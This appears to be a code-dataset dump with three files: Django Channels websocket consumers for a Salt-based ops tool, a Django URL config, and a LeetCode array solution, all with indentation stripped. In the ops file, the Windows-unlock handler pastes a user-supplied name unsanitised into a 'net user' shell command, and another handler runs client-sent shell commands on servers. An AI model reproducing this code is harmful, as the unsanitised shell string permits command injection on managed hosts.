def connection_groups(self, **kwargs):
return self.groups or [self.label()]
def receive(self, content, **kwargs):
super(ActionDetailConsumer, self).receive(content, **kwargs)
if not self.message.user.is_authenticated:
self.send({'result': '未授权,请联系管理员!'})
return
self.group_send(self.label(), self.yes)
@classmethod
def task_change(cls, task_id):
settings.logger.info(f'{cls.group_prefix}{task_id}')
ActionDetailConsumer.group_send(f'{cls.group_prefix}{task_id}', cls.yes)
class UnlockWinConsumer(OmConsumer):
def receive(self, content, **kwargs):
super(UnlockWinConsumer, self).receive(content, **kwargs)
if not self.message.user.is_authenticated:
self.send({'result': '未授权,请联系管理员!'})
return
user = content.get('user', None)
server_info = content.get('server_info', None)
if not all([user, server_info]) or not all([user.strip(), server_info]):
self.send({'result': '参数选择错误,请检查!'})
agents = [x['name'] for x in server_info]
if settings.OM_ENV == 'PRD': # 只有生产环境可以双通
prd_agents = list(SaltMinion.objects.filter(name__in=agents, env='PRD', os='Windows').values_list('name', flat=True))
settings.logger.info('prd_agents:{ag}'.format(ag=repr(prd_agents)))
uat_agents = list(SaltMinion.objects.exclude(env='PRD').filter(name__in=agents, os='Windows').values_list('name', flat=True))
settings.logger.info('uat_agents:{ag}'.format(ag=repr(uat_agents)))
if len(prd_agents) > 0:
prd_result, prd_output = Salt('PRD').shell(prd_agents, f'net user {user} /active:yes')
else:
prd_result, prd_output = True, ''
if len(uat_agents) > 0:
uat_result, uat_output = Salt('UAT').shell(uat_agents, f'net user {user} /active:yes')
else:
uat_result, uat_output = True, ''
salt_result = prd_result and uat_result
salt_output = fmt_salt_out('{prd}\n{uat}'.format(prd=fmt_salt_out(prd_output), uat=fmt_salt_out(uat_output)))
else:
agents = list(SaltMinion.objects.exclude(env='PRD').filter(name__in=agents, os='Windows').values_list('name', flat=True))
settings.logger.info('agents:{ag}'.format(ag=repr(agents)))
if len(agents) > 0:
salt_result, salt_output = Salt('UAT').shell(agents, 'net user {user} /active:yes'.format(user=user))
else:
salt_result, salt_output = True, ''
salt_output = fmt_salt_out(salt_output)
if salt_result:
settings.logger.info('unlock success!')
result = salt_output.replace('The command completed successfully', '解锁成功')
result = result.replace('[{}]', '选中的机器不支持解锁,请联系基础架构同事解锁!')
self.send({"result": result})
else:
settings.logger.info('unlock false for salt return false')
self.send({"result": '解锁失败!'})
class CmdConsumer(OmConsumer):
# noinspection PyBroadException
def receive(self, content, **kwargs):
super(CmdConsumer, self).receive(content, **kwargs)
if not self.message.user.is_authenticated:
self.send({'result': '未授权,请联系管理员!'})
return
name = content.get('name', '').strip()
cmd = content.get('cmd', '').strip()
user = content.get('user', '').strip()
if not all([name, cmd, user]):
self.send({'result': '参数错误!'})
return
try:
pc = SaltMinion.objects.get(name=name, status='up')
if not any(
[self.message.user.has_perm('om.can_exec_cmd'),
self.message.user.has_perm('om.can_exec_cmd', pc)]
):
self.send({'result': '没有执行命令权限,请联系管理员!'})
return
if not any([self.message.user.has_perm('om.can_root'), self.message.user.has_perm('om.can_root', pc)]):
if user == 'root':
self.send({'result': '没有root权限,请联系管理员!'})
return
_, back = Salt(pc.env).shell(pc.name, cmd, None if user == 'NA' else user)
self.send({'result': back['return'][0].get(name, '未知结果!')})
except Exception as e:
self.send({'result': f"{e}\n{content}"})
class MakeFireWallConsumer(OmConsumer):
# noinspection PyBroadException
def receive(self, content, **kwargs):
super(MakeFireWallConsumer, self).receive(content, **kwargs)
if not self.message.user.is_authenticated:
self.send({'result': '未授权,请联系管理员!'})
return
s_ip = content.get('s_ip', '').strip()
t_ip = content.get('t_ip', '').strip()
port = content.get('port', '').strip()
if not all([s_ip, t_ip, port]):
self.send({'result': '参数错误!'})
return
s_ip = s_ip.replace('<pre>', '').replace('</pre>', '').split('<br>')
t_ip = t_ip.replace('<pre>', '').replace('</pre>', '').split('<br>')
port = port.replace('<pre>', '').replace('</pre>', '').split('<br>')
try:
src_ag = [SaltMinion.objects.get(name__endswith='-'+x) for x in s_ip]
dst_ag = [SaltMinion.objects.get(name__endswith='-'+x) for x in t_ip]
result = []
for p in port:
cf = CheckFireWall(src_ag, dst_ag, int(p))
result.append(cf.check())
# self.message.reply_channel.send({'text': json.dumps(result)}, immediately=True)
self.send(result)
except Exception as e:
if self.message.user.is_superuser:
self.send({'result': f"{e}\n{traceback.format_exc()}\n{content}"})
else:
self.send({'result': 'error'})
class CheckFireWallConsumer(OmConsumer):
def check_port(self, src_list, dst_list, port):
result = []
for p in port:
cf = CheckFireWall(src_list, dst_list, int(p))
result.append(cf.check())
self.send(result)
def check_policy(self, src_list, dst_list, port):
from utils.util import FireWallPolicy
src = ';'.join([x.ip() for x in src_list])
dst = ';'.join([x.ip() for x in dst_list])
srv = ','.join([f'tcp/{x}' for x in port])
self.send({
'src': [x.ip() for x in src_list],
'dst': [x.ip() for x in dst_list],
'port': port,
'protocol': 'TCP',
'result': FireWallPolicy(src, dst, srv).check()
})
def receive(self, content, **kwargs):
super(CheckFireWallConsumer, self).receive(content, **kwargs)
if not self.message.user.is_authenticated:
self.send({'result': '未授权,请联系管理员!'})
return
check_type = content.get('check_type', '')
src = content.get('src', [])
dst = content.get('dst', [])
port = [int(x) for x in re.split(r'\W+', content.get('port', [''])[0]) if x.strip() != '']
try:
if all([src, dst, port]):
src_list = [x for x in SaltMinion.objects.filter(pk__in=src)]
dst_list = [x for x in SaltMinion.objects.filter(pk__in=dst)]
if all([src_list, dst_list]):
if check_type == 'port':
self.check_port(src_list, dst_list, port)
elif check_type == 'policy':
self.check_policy(src_list, dst_list, port)
else:
self.send({'result': '类型错误'})
except Exception as e:
settings.logger.error(repr(e))
if self.message.user.is_superuser:
self.send({'result': f"{e}\n{traceback.format_exc()}\n{content}"})
else:
self.send({'result': '执行报错,请联系管理员检查!'})
om_routing = [
SaltConsumer.as_route(path=r"^/om/salt_status/"),
ActionDetailConsumer.as_route(path=r"^/om/action_detail/", attrs={'group_prefix': 'action_detail-'}),
UnlockWinConsumer.as_route(path=r"^/om/unlock_win/"),
CmdConsumer.as_route(path=r'^/om/admin_action/'),
MakeFireWallConsumer.as_route(path=r'^/utils/make_firewall_table/'),
CheckFireWallConsumer.as_route(path=r'^/utils/check_firewall/'),
ServerConsumer.as_route(path=r'^/om/show_server/')
]
| cash2one/ActionSpace | om/worker.py | worker.py | py | 12,465 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "channels.generic.websockets.JsonWebsocketConsumer",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "django.contrib.auth.models.User.objects.get_or_create",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "django.contrib.auth.models.User.objects",... |
15147278540 | from django.urls import path
from . import views
app_name = 'cis'
urlpatterns = [
path('cis/<status>/', views.CIListView.as_view(), name='ci_list'),
path('ci/create/', views.CICreateView.as_view(), name='ci_create'),
path('ci/upload/', views.ci_upload, name='ci_upload'),
path('ci/<int:pk>', views.CIDetailView.as_view(), name='ci_detail'),
path('ci/pack/send/', views.send_ci_pack, name='ci_pack_send'),
path('places/', views.manage_client_places, name='manage_client_places'),
path('place/create/', views.PlaceCreateView.as_view(), name='place_create'),
path('place/<int:pk>', views.PlaceUpdateView.as_view(), name='place_update'),
path('manufacturer/<int:pk>', views.ManufacturerDetailView.as_view(), name='manufacturer_detail'),
path('appliances/', views.ApplianceListView.as_view(), name='appliance_list'),
path('appliance/create/', views.ApplianceCreateView.as_view(), name='appliance_create'),
path('appliance/<int:pk>', views.ApplianceUpdateView.as_view(), name='appliance_update'),
]
| DiegoVilela/internalize | cis/urls.py | urls.py | py | 1,043 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "django.urls.path",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "django.urls.path",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "django.urls.path",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "django.urls.path",
... |
73652428349 | # 给你一个下标从 0 开始的整数数组 nums 。
# 现定义两个数字的 串联 是由这两个数值串联起来形成的新数字。
# 例如,15 和 49 的串联是 1549 。
# nums 的 串联值 最初等于 0 。执行下述操作直到 nums 变为空:
# 如果 nums 中存在不止一个数字,分别选中 nums 中的第一个元素和最后一个元素,将二者串联得到的值加到 nums 的 串联值 上,然后从 nums 中删除第一个和最后一个元素。
# 如果仅存在一个元素,则将该元素的值加到 nums 的串联值上,然后删除这个元素。
# 返回执行完所有操作后 nums 的串联值。
from typing import List
class Solution:
def findTheArrayConcVal(self, nums: List[int]) -> int:
ans = 0
while(len(nums) > 0):
if len(nums) == 1:
ans += nums.pop()
else:
l = nums.pop(0)
r = nums.pop()
ans += int(str(l) + str(r))
return ans
nums = [7,52,2,4]
a = Solution()
print(a.findTheArrayConcVal(nums)) | xxxxlc/leetcode | competition/单周赛/332/findTheArrayConcVal.py | findTheArrayConcVal.py | py | 1,115 | python | zh | code | 0 | github-code | 6 | [
{
"api_name": "typing.List",
"line_number": 15,
"usage_type": "name"
}
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.